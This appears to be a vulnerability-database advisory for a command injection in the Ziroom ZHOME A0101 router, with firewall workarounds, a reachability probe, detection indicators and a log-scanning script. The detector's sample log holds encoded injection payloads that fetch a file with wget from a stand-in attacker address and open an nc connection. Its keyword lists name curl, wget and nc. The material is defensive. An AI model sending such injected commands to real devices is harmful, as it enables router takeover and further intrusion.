CVE-2026-1802
📋 TL;DR
This CVE describes a command injection vulnerability in the Ziroom ZHOME A0101 router, firmware version 1.0.1.0. The macType parameter of the macAddrClone function (reached through the /api/zrMacClone endpoint of the web interface) is used in an operating-system command without sanitisation, so an unauthenticated attacker who can reach the web interface can execute arbitrary commands on the device. All devices running this firmware are affected.
💻 Affected Systems
- Ziroom ZHOME A0101
⚠️ Manual Verification Required
This CVE has no affected-version range in our database, so automatic vulnerability detection cannot tell whether your device is affected.
Why? The NVD entry provides no version ranges (none were supplied by the vendor or NVD). The description names firmware 1.0.1.0 as vulnerable; whether other builds are affected has not been confirmed either way, so treat them as unverified rather than safe.
- Review the CVE details at NVD
- Check vendor security advisories for your specific version
- Test if the vulnerability is exploitable in your environment
- Consider updating to the latest version as a precaution
⚠️ Risk & Real-World Impact
Worst Case
Complete device compromise allowing attackers to install persistent backdoors, pivot to internal networks, intercept all network traffic, or brick the device.
Likely Case
Attackers gain shell access to execute commands, potentially installing malware, modifying router settings, or using the device as part of a botnet.
If Mitigated
If network segmentation and strict firewall rules are in place, impact may be limited to the router itself without lateral movement.
🎯 Exploit Status
Exploit code is publicly available on GitHub. The vulnerability requires no authentication and has simple exploitation steps.
🛠️ Fix & Mitigation
✅ Official Fix
Patch Version: Unknown
Vendor Advisory: None available
Restart Required: No
Instructions:
No official patch available. Consider replacing affected devices or implementing workarounds.
🔧 Temporary Workarounds
Disable the web management interface
Disable the vulnerable web interface so the endpoint cannot be reached at all. This assumes the device exposes an OpenWrt-style uci/uhttpd stack and that you have shell (SSH or serial) access; it also removes LAN-side management, so keep SSH available or be prepared to factory-reset. If you only need the WAN side closed, binding uhttpd to the LAN address is a smaller change than switching it off.
# Assumes an OpenWrt-style image with uci/uhttpd and shell access
uci -q delete uhttpd.main.listen_http
uci -q delete uhttpd.main.listen_https
uci commit uhttpd
/etc/init.d/uhttpd stop       # takes the interface down now
/etc/init.d/uhttpd disable    # keeps it down across reboots
Block the API endpoint at the firewall
Drop plaintext HTTP requests that carry the endpoint name using an iptables string match. Caveats: this only works on port 80, because on port 443 the request path is inside TLS and no string match can see it; it needs the xt_string kernel module; it is bypassed by percent-encoding the path (e.g. zrMac%43lone) or splitting it across TCP segments; and it must be inserted at the top of INPUT (-I, not -A), because on OpenWrt the zone chains accept web traffic before appended rules are reached. Rules added this way do not survive a reboot unless you also put them in /etc/firewall.user (or the uci firewall config). Treat it as a stopgap and restrict who can reach the ports instead.
# Plaintext HTTP only; requires xt_string. Insert at the top of INPUT.
iptables -I INPUT -p tcp --dport 80 -m string --string "zrMacClone" --algo bm -j DROP
# No string match is possible for HTTPS (the path is encrypted), so restrict 443 by source.
# 192.168.1.0/24 is a placeholder: replace it with your LAN subnet.
iptables -I INPUT -p tcp --dport 443 ! -s 192.168.1.0/24 -j DROP
🧯 If You Can't Patch
- Isolate affected routers in a dedicated VLAN with strict firewall rules preventing outbound connections
- Implement network monitoring to detect exploitation attempts and unusual router behavior
🔍 How to Verify
Check if Vulnerable:
Confirm the model is ZHOME A0101 and the firmware is 1.0.1.0 (shown on the web interface's status/about page, or over SSH if enabled). Builds other than 1.0.1.0 have not been confirmed either way.
Check Version:
grep VERSION /etc/openwrt_release
If the image is OpenWrt-based, this prints the underlying OpenWrt release, not the vendor's 1.0.1.0 string, so use it alongside the web interface rather than instead of it.
Verify Fix Applied:
From an untrusted network position (for example the WAN side), confirm that /api/zrMacClone no longer answers: a connection refusal, a timeout, a 403 or a 404 means the workaround is in effect, while any application response means the handler is still exposed. Do not send injection payloads to a production device to test this.
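A small reachability check for the step above, written for this page as an added example (it is not the vendor's or the page's own code). It sends one parameter-free request to /api/zrMacClone and classifies the HTTP status; it never sends an injection payload. The POST method, the empty body and the status-to-verdict mapping are assumptions; only the endpoint path comes from the advisory. Run it from where an attacker would sit (for example against the WAN address) to confirm the handler is no longer exposed after a workaround.

```python
"""Reachability check for /api/zrMacClone (added example, not vendor code).

Sends one parameter-free request and classifies the HTTP status. It never
sends a command-injection payload: it only reports whether the vulnerable
handler answers from wherever you run it. POST with an empty body is an
assumption; the advisory names the path but not the request shape.
"""
import http.client
import ssl
import sys

ENDPOINT = "/api/zrMacClone"


def classify(status):
    """Map an HTTP status (or None for no answer) to an exposure verdict."""
    if status is None:
        return "unreachable"      # nothing answered: firewalled or service off
    if status == 404:
        return "absent"           # no handler at this path (or it was removed)
    if status in (401, 403) or 300 <= status < 400:
        return "auth-gated"       # access-controlled, or redirected to a login page
    return "exposed"              # handler answered: 2xx, 400, 405, 500, ...


def probe(host, port=80, use_tls=False, timeout=5.0):
    """Return (status, verdict) for host:port; status is None on connection failure."""
    try:
        if use_tls:
            # Consumer routers ship self-signed certs; skip verification for a probe.
            ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
            ctx.check_hostname = False
            ctx.verify_mode = ssl.CERT_NONE
            conn = http.client.HTTPSConnection(host, port, timeout=timeout, context=ctx)
        else:
            conn = http.client.HTTPConnection(host, port, timeout=timeout)
        conn.request("POST", ENDPOINT, body=b"", headers={"Content-Length": "0"})
        status = conn.getresponse().status
        conn.close()
    except (OSError, http.client.HTTPException):
        status = None
    return status, classify(status)


if __name__ == "__main__":
    target = sys.argv[1] if len(sys.argv) > 1 else "192.168.1.1"
    for port, tls in ((80, False), (443, True)):
        status, verdict = probe(target, port, tls)
        print(f"{target}:{port}{ENDPOINT} -> status={status} verdict={verdict}")
```

Usage: `python3 probe.py <router address>`. An "exposed" verdict from the WAN side means the workaround is not in effect; "auth-gated" on a consumer router usually means a redirect to the login page and should be checked by hand, because the injection itself requires no authentication.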
📡 Detection & Monitoring
Log Indicators:
- Requests to /api/zrMacClone whose macType value, once percent-decoded, contains shell metacharacters (";", "|", "&", "$(", backticks) or tool names such as wget, curl, nc or busybox
- Unexpected processes on the router (downloaders, reverse shells, unknown binaries in /tmp) and unfamiliar commands in system logs
- Web interface authentication events are a weak signal here: the injection needs no authentication, so do not wait for failed logins
Network Indicators:
- Unusual outbound connections from router
- Traffic to known malicious IPs from router
- DNS queries to suspicious domains
SIEM Query (Splunk-style; the source and field names depend on your ingest):
source="router.log" AND "zrMacClone" AND ("curl" OR "wget" OR "nc" OR "busybox" OR "bash" OR "/bin/sh")
Percent-decode request lines before matching, or the encoded payload will not hit these terms; a bare "sh" term is too noisy to use on its own.
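To make the indicators above concrete, the following detector, added here as an example and not taken from the page or any vendor tooling, scans web-access log lines for requests to /api/zrMacClone whose macType value contains shell metacharacters or common tool names after percent-decoding. The log format and the sample lines in SAMPLE_LOG are constructed for this example. It decodes repeatedly so double-encoded payloads are not missed. Note that a standard access log only carries the parameter when it travels in the query string; POST bodies need a reverse proxy or packet capture in front of the device.

```python
"""Detect command-injection attempts against /api/zrMacClone in access logs.

Added example (not from the advisory or the vendor). The log format and the
SAMPLE_LOG lines are constructed: <ts> <src> "<METHOD> <target>" <status>.
"""
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed sample lines: 192.168.1.x are benign LAN clients, 203.0.113.7 an attacker.
SAMPLE_LOG = """\
2026-01-10T09:12:01Z 192.168.1.20 "POST /api/zrMacClone?macType=manual&mac=00:11:22:33:44:55" 200
2026-01-10T09:13:44Z 203.0.113.7 "POST /api/zrMacClone?macType=manual%3B%2Fbin%2Fbusybox%20wget%20http%3A%2F%2F203.0.113.7%2Fx%20-O%20%2Ftmp%2Fx" 200
2026-01-10T09:14:02Z 203.0.113.7 "POST /api/zrMacClone?macType=%2524(nc%2520203.0.113.7%25204444)" 200
2026-01-10T09:15:30Z 192.168.1.21 "GET /api/status" 200
"""

LINE_RE = re.compile(r'^(?P<ts>\S+) (?P<src>\S+) "(?P<method>[A-Z]+) (?P<target>\S+)" (?P<status>\d{3})$')
SHELL_META = re.compile(r"[;|&`$]")                             # separators and substitution
TOOL_NAMES = re.compile(r"\b(curl|wget|nc|busybox|telnetd|sh|bash)\b")


def decode_fully(value, max_rounds=3):
    """Percent-decode until stable so double encoding (%2524 -> %24 -> $) is seen."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def inspect_line(line):
    """Return a finding dict for a suspicious zrMacClone request, else None."""
    m = LINE_RE.match(line)
    if not m:
        return None
    parts = urlsplit(m["target"])
    if not parts.path.endswith("/api/zrMacClone"):
        return None
    # parse_qs removes one layer of encoding; decode_fully handles any nesting.
    for raw in parse_qs(parts.query, keep_blank_values=True).get("macType", []):
        value = decode_fully(raw)
        reasons = []
        if SHELL_META.search(value):
            reasons.append("shell metacharacter")
        if TOOL_NAMES.search(value):
            reasons.append("tool name")
        if reasons:
            return {"ts": m["ts"], "src": m["src"], "macType": value, "reasons": reasons}
    return None


def scan(log_text):
    """Run inspect_line over every line and collect the findings."""
    return [hit for hit in map(inspect_line, log_text.splitlines()) if hit]


if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(f"{hit['ts']} {hit['src']} macType={hit['macType']!r} ({', '.join(hit['reasons'])})")
```

On the sample input the benign request (a plain "manual" value with a MAC address) is ignored, while both attacker lines are reported, including the double-encoded `$(nc ...)` one that a single-pass decoder would miss.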